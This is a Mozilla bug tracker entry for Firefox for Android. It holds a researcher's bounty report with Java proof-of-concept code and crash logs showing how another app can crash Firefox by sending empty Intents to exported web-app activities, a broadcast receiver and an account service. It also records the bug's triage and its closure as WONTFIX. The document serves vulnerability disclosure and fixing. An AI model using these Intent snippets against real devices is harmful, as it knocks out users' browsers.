Closed
Bug 1036437
Opened 10 years ago
Closed 8 years ago
Other Android apps can send malformed intents to crash Firefox
Categories
(Firefox for Android Graveyard :: Web Apps (PWAs), defect, P1)
Tracking
(Not tracked)
RESOLVED
WONTFIX
People
(Reporter: curtisk, Unassigned)
References
Details
(Keywords: csectype-dos, sec-low, Whiteboard: [reporter-external][verif?][WebRuntime])
From: Claudiu Chelaru <claxche@gmail.com>
Subject: Security Bug Bounty: 103 ways to crash Firefox for Android
Message-Id: <6FCFE5B0-80F8-4D46-BF16-369834049089@gmail.com>
Date: Sat, 5 Jul 2014 14:04:15 +0300
To: security@mozilla.org
-----//-----

Hi,

During my research I’ve found some issues regarding Firefox for Android - (org.mozilla.firefox) via cross application exploitation. Upon receiving malformed data the app will crash with the following message: “Unfortunately, Firefox has stopped.”

Tested on Samsung Galaxy S3 - Android 4.3 API 18.

1) Activities

Firefox crashes if an Intent with no arguments is sent to any of the following Activities:
- org.mozilla.firefox.Webapp
- org.mozilla.firefox.WebApps$WebApp0
- org.mozilla.firefox.WebApps$WebApp1
- org.mozilla.firefox.WebApps$WebApp2
- org.mozilla.firefox.WebApps$WebApp3
- org.mozilla.firefox.WebApps$WebApp4
- org.mozilla.firefox.WebApps$WebApp5
- org.mozilla.firefox.WebApps$WebApp6
- org.mozilla.firefox.WebApps$WebApp7
- org.mozilla.firefox.WebApps$WebApp8
- org.mozilla.firefox.WebApps$WebApp9
- org.mozilla.firefox.WebApps$WebApp10
- org.mozilla.firefox.WebApps$WebApp11
- org.mozilla.firefox.WebApps$WebApp12
- org.mozilla.firefox.WebApps$WebApp13
- org.mozilla.firefox.WebApps$WebApp14
- org.mozilla.firefox.WebApps$WebApp15
- org.mozilla.firefox.WebApps$WebApp16
- org.mozilla.firefox.WebApps$WebApp17
- org.mozilla.firefox.WebApps$WebApp18
- org.mozilla.firefox.WebApps$WebApp19
- org.mozilla.firefox.WebApps$WebApp20
- org.mozilla.firefox.WebApps$WebApp21
- org.mozilla.firefox.WebApps$WebApp22
- org.mozilla.firefox.WebApps$WebApp23
- org.mozilla.firefox.WebApps$WebApp24
- org.mozilla.firefox.WebApps$WebApp25
- org.mozilla.firefox.WebApps$WebApp26
- org.mozilla.firefox.WebApps$WebApp27
- org.mozilla.firefox.WebApps$WebApp28
- org.mozilla.firefox.WebApps$WebApp29
- org.mozilla.firefox.WebApps$WebApp30
- org.mozilla.firefox.WebApps$WebApp31
- org.mozilla.firefox.WebApps$WebApp32
- org.mozilla.firefox.WebApps$WebApp33
- org.mozilla.firefox.WebApps$WebApp34
- org.mozilla.firefox.WebApps$WebApp35
- org.mozilla.firefox.WebApps$WebApp36
- org.mozilla.firefox.WebApps$WebApp37
- org.mozilla.firefox.WebApps$WebApp38
- org.mozilla.firefox.WebApps$WebApp39
- org.mozilla.firefox.WebApps$WebApp40
- org.mozilla.firefox.WebApps$WebApp41
- org.mozilla.firefox.WebApps$WebApp42
- org.mozilla.firefox.WebApps$WebApp43
- org.mozilla.firefox.WebApps$WebApp44
- org.mozilla.firefox.WebApps$WebApp45
- org.mozilla.firefox.WebApps$WebApp46
- org.mozilla.firefox.WebApps$WebApp47
- org.mozilla.firefox.WebApps$WebApp48
- org.mozilla.firefox.WebApps$WebApp49
- org.mozilla.firefox.WebApps$WebApp50
- org.mozilla.firefox.WebApps$WebApp51
- org.mozilla.firefox.WebApps$WebApp52
- org.mozilla.firefox.WebApps$WebApp53
- org.mozilla.firefox.WebApps$WebApp54
- org.mozilla.firefox.WebApps$WebApp55
- org.mozilla.firefox.WebApps$WebApp56
- org.mozilla.firefox.WebApps$WebApp57
- org.mozilla.firefox.WebApps$WebApp58
- org.mozilla.firefox.WebApps$WebApp59
- org.mozilla.firefox.WebApps$WebApp60
- org.mozilla.firefox.WebApps$WebApp61
- org.mozilla.firefox.WebApps$WebApp62
- org.mozilla.firefox.WebApps$WebApp63
- org.mozilla.firefox.WebApps$WebApp64
- org.mozilla.firefox.WebApps$WebApp65
- org.mozilla.firefox.WebApps$WebApp66
- org.mozilla.firefox.WebApps$WebApp67
- org.mozilla.firefox.WebApps$WebApp68
- org.mozilla.firefox.WebApps$WebApp69
- org.mozilla.firefox.WebApps$WebApp70
- org.mozilla.firefox.WebApps$WebApp71
- org.mozilla.firefox.WebApps$WebApp72
- org.mozilla.firefox.WebApps$WebApp73
- org.mozilla.firefox.WebApps$WebApp74
- org.mozilla.firefox.WebApps$WebApp75
- org.mozilla.firefox.WebApps$WebApp76
- org.mozilla.firefox.WebApps$WebApp77
- org.mozilla.firefox.WebApps$WebApp78
- org.mozilla.firefox.WebApps$WebApp79
- org.mozilla.firefox.WebApps$WebApp80
- org.mozilla.firefox.WebApps$WebApp81
- org.mozilla.firefox.WebApps$WebApp82
- org.mozilla.firefox.WebApps$WebApp83
- org.mozilla.firefox.WebApps$WebApp84
- org.mozilla.firefox.WebApps$WebApp85
- org.mozilla.firefox.WebApps$WebApp86
- org.mozilla.firefox.WebApps$WebApp87
- org.mozilla.firefox.WebApps$WebApp88
- org.mozilla.firefox.WebApps$WebApp89
- org.mozilla.firefox.WebApps$WebApp90
- org.mozilla.firefox.WebApps$WebApp91
- org.mozilla.firefox.WebApps$WebApp92
- org.mozilla.firefox.WebApps$WebApp93
- org.mozilla.firefox.WebApps$WebApp94
- org.mozilla.firefox.WebApps$WebApp95
- org.mozilla.firefox.WebApps$WebApp96
- org.mozilla.firefox.WebApps$WebApp97
- org.mozilla.firefox.WebApps$WebApp98
- org.mozilla.firefox.WebApps$WebApp99

- The logcat log contains the following messages confirming that the application has crashed (applicable for all WebApps Classes as well):
  * "FATAL EXCEPTION: main"
  * "E/AndroidRuntime( 3055): android.app.SuperNotCalledException: Activity {org.mozilla.firefox/org.mozilla.firefox.Webapp} did not call through to super.onCreate()"
  * "I/ActivityManager( 353): Process org.mozilla.firefox:org.mozilla.firefox.Webapp (pid 3055) has died."

- Proof of Concept (applicable for all WebApps Classes as well):

    Intent intent = new Intent();
    intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.firefox.Webapp"));
    startActivity(intent);

2) Broadcast Receivers

Firefox crashes if an Intent is broadcasted to "org.mozilla.gecko.webapp.UninstallListener" with no arguments.

- The logcat log contains the following messages confirming that the application has crashed:
  * "E/AndroidRuntime( 3071): FATAL EXCEPTION: main"
  * "E/AndroidRuntime( 3071): java.lang.RuntimeException: Unable to start receiver org.mozilla.gecko.webapp.UninstallListener: java.lang.NullPointerException"

- Proof of Concept:

    Intent intent = new Intent();
    intent.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.webapp.UninstallListener"));
    sendBroadcast(intent);

3) Services

Firefox crashes if a random message is sent to "org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService".

- The logcat log contains the following messages confirming that the application has crashed:
  * "E/AndroidRuntime( 3217): FATAL EXCEPTION: main"
  * "E/AndroidRuntime( 3217): java.lang.RuntimeException: Unable to bind to service org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService@5274670c with Intent { cmp=org.mozilla.firefox/org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService }: java.lang.NullPointerException"

- Proof of Concept:

    Intent service = new Intent();
    service.setComponent(new ComponentName("org.mozilla.firefox", "org.mozilla.gecko.fxa.authenticator.FxAccountAuthenticatorService"));
    v.getContext().bindService(service, new ServiceConnection() {
        @Override
        public void onServiceConnected(ComponentName name, IBinder service) {
            Messenger messenger = new Messenger(service);
            try {
                messenger.send(Message.obtain(null, 1, 2, 3));
            } catch (RemoteException e) { }
        }
    }, Context.BIND_AUTO_CREATE);

Kind Regards,
Claudiu Chelaru
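A defensive pattern for the activity and receiver crashes reported above, as an added example that is not part of the original report and is not Firefox code: exported components that validate the incoming Intent before using it. The class names, the extra key and the choice of ACTION_PACKAGE_REMOVED as the expected action are assumptions for illustration.

```java
import android.app.Activity;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

// Hypothetical classes for illustration; not taken from the Firefox code base.
public final class HardenedComponents {
    static final String TAG = "HardenedComponents";
    static final String EXTRA_URL = "example.extra.URL"; // assumed extra key

    // Reading extras unparcels sender-controlled data and can throw, so guard it.
    static String safeStringExtra(Intent intent, String key) {
        if (intent == null) return null;
        try {
            return intent.getStringExtra(key);
        } catch (RuntimeException e) { return null; }
    }

    // Exported activity: any app can start it with an empty explicit Intent.
    public static class WebappActivity extends Activity {
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            // Call super first, so no early exit can raise SuperNotCalledException.
            super.onCreate(savedInstanceState);
            String url = safeStringExtra(getIntent(), EXTRA_URL);
            if (url == null || !url.startsWith("https://")) {
                Log.w(TAG, "Rejecting Intent without a valid URL extra");
                finish(); // close the activity instead of crashing the process
                return;
            }
        }
    }

    // Exported receiver: the action and the data are both sender-controlled.
    public static class UninstallReceiver extends BroadcastReceiver {
        @Override
        public void onReceive(Context context, Intent intent) {
            if (intent == null || !Intent.ACTION_PACKAGE_REMOVED.equals(intent.getAction())) {
                return; // an Intent with no action, as in the report, is ignored
            }
            Uri data = intent.getData();
            String pkg = (data == null) ? null : data.getSchemeSpecificPart();
            if (pkg == null || pkg.isEmpty()) return; // no package name to act on
            Log.i(TAG, "Cleaning up state for " + pkg);
        }
    }
}
```

Components that other apps never need to reach can instead be declared with android:exported="false" in the manifest, which removes this input path entirely.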
Reporter
Comment 1•10 years ago
assigned to mgoodwin for verification
Assignee: nobody → mgoodwin
Flags: sec-bounty?
Whiteboard: [reporter-external][verif?]
Reporter
Updated•10 years ago
Summary: crashes Intents → crashes in intents
Updated•10 years ago
Component: General → Web Apps
QA Contact: aaron.train
Comment 2•10 years ago
Going to break point 3 into a separate bug.
Updated•10 years ago
Priority: -- → P1
Whiteboard: [reporter-external][verif?] → [reporter-external][verif?][WebRuntime]
Updated•10 years ago
Assignee: mgoodwin → nobody
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: sec-bounty? → sec-bounty-
Keywords: csectype-dos
Summary: crashes in intents → Other Android apps can send malformed intents to crash Firefox
Updated•9 years ago
Group: core-security → firefox-core-security
Comment 5•8 years ago
Per bug 1235869, we're going to disable the Android web runtime, so we won't fix this bug in it. (This is part of a bulk resolution of bugs in the Firefox for Android::Web Apps component, from which I attempted to exclude bugs that are not specific to the runtime, but it's possible that I included one accidentally. If so, I'm sorry, and please reopen the bug!)
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → WONTFIX
Updated•7 years ago
Group: firefox-core-security
Updated•3 years ago
Product: Firefox for Android → Firefox for Android Graveyard